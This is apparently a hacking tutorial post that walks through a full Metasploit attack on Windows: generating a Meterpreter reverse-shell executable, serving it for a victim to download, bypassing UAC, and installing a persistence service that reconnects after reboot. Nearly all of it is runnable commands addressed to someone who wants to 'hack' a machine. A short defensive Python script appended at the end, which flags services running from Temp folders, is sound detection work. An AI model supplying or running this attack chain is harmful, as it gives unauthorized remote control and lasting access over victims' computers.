Persistence Backdoor Using Metasploit

UAC Bypass/Persistence Backdoor Using Metasploit

Creating Payload

Step 1:- To Create A Payload For Windows, Open A Terminal And Type:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=1212 -f exe > /var/www/html/test.exe

Note: 192.168.0.103 Is My System's IP Address And 1212 Is The Port Number That I Want To Use.

Step 2:- To Start The Apache Server, Write The Below Command:

    service apache2 start


Step 3:- Open The Browser Of The Machine That You Want To Hack And Type The IP Address Of Your System To Download The Payload (test.exe).

Set Payload

Step 4:- Start msfconsole.

Step 5:- Write The Following Commands To Select The Handler, Set The Payload, Provide The IP And Port, And Run.

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.0.103
    set lport 1212
    run
You Will Get A Session; Then Run:
    sysinfo

UAC Bypass

Step 6:- To Get Admin Level Privilege We First Need To Migrate To Another Process.
Write The "ps" Command To See The Full Process List.

Step 7:- Write The Below Command To Migrate Into explorer.exe (5424 Is Its PID In My Case; Use The PID Shown By ps).
    migrate 5424
Then Send The Session To The Background With The Below Command.
    background

Step 8:- Search For The UAC Bypass Modules.
    search uac

Step 9:- Use Module Number 10 From The Search Results (exploit/windows/local/bypassuac_sdclt; The Number Depends On Your Search Output) To Get System Level Privilege, And Then Write The Below Commands.
    use exploit/windows/local/bypassuac_sdclt
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.0.103
    set lport 1212
    show options
    set session 1
    run

Step 10:- Write The Below Command To See The "Enabled Process Privileges".
    getprivs

Persistence Backdoor

Step 11:- Send The Session To The Background Again, For That Write The Below Command.
    background

Step 12:- Search For The Persistence Modules.
    search persistence

Step 13:- "use 17" Or "use exploit/windows/local/persistence_service" To Select The Module (The Number Depends On Your Search Output), And Then Write The Following Commands. For "set session" Select Your Running Session From The "sessions -l" Output.
    show options
    sessions -l
    set session 2
    set lport 1212
    run

Step 14:- Now Go To The Folder Path Printed By The Module (The Meterpreter Service) And Check:
A Copy Of Your Payload File Will Be Saved In That Path.
In My Case My File Is Stored In "c:\users\rajvi\appdata\local\temp\yGvLFJ.exe".


Step 15:- If The Victim Reboots The System, The Previous Meterpreter Session Will Be Closed.
Because The Installed Service Runs The Payload Again At Boot, We Can Get Back Our Session Using The Following Commands:
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.0.103
    set lport 1212
    run
    sessions -l
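
From the defender's side, the artifact Step 14 leaves behind (a Windows service whose binary is a random-named copy of the payload under the user's AppData\Local\Temp) is easy to hunt for. The script below is an added example, not part of the original post; it assumes you have exported service records (name plus ImagePath) from a host, and the records in SAMPLE_SERVICES are constructed for the demo (the service name "yGvLFJ" is made up, the post only gives the file path).

```python
import re

# Service binaries essentially never live in a user's or the system's Temp
# directory; the persistence_service drop described in the post lands there.
TEMP_DIR_RE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata\\local\\temp|windows\\temp)\\",
    re.IGNORECASE,
)


def binary_from_image_path(image_path: str) -> str:
    """Extract the executable from a service ImagePath / PathName value.

    Handles the three shapes seen in the registry: a quoted path followed
    by arguments, an unquoted path followed by arguments, and a bare path.
    """
    value = image_path.strip()
    if value.startswith('"'):
        closing = value.find('"', 1)
        return value[1:closing] if closing > 0 else value[1:]
    # Unquoted: the binary ends at the first ".exe" (the path may contain spaces).
    match = re.match(r"(.+?\.exe)", value, re.IGNORECASE)
    if match:
        return match.group(1)
    return value.split()[0] if value else ""


def find_temp_services(services):
    """Return (service name, binary) for every service whose binary sits in Temp."""
    hits = []
    for svc in services:
        binary = binary_from_image_path(svc["ImagePath"])
        if TEMP_DIR_RE.search(binary):
            hits.append((svc["Name"], binary))
    return hits


# Constructed sample records in the shape of HKLM\...\Services\<name>\ImagePath.
SAMPLE_SERVICES = [
    {"Name": "wuauserv", "ImagePath": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
    {"Name": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"Name": "VendorUpdater", "ImagePath": r'"C:\Program Files\Vendor\updater.exe" --service'},
    {"Name": "yGvLFJ", "ImagePath": r"C:\Users\rajvi\AppData\Local\Temp\yGvLFJ.exe"},  # constructed
    {"Name": "TmpSvc", "ImagePath": r'"C:\Windows\Temp\helper.exe" /run'},
]

if __name__ == "__main__":
    for name, binary in find_temp_services(SAMPLE_SERVICES):
        print(f"[!] service {name!r} runs from a Temp directory: {binary}")
```

On a live host the same check runs over the PathName values from `Get-CimInstance Win32_Service` or the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services.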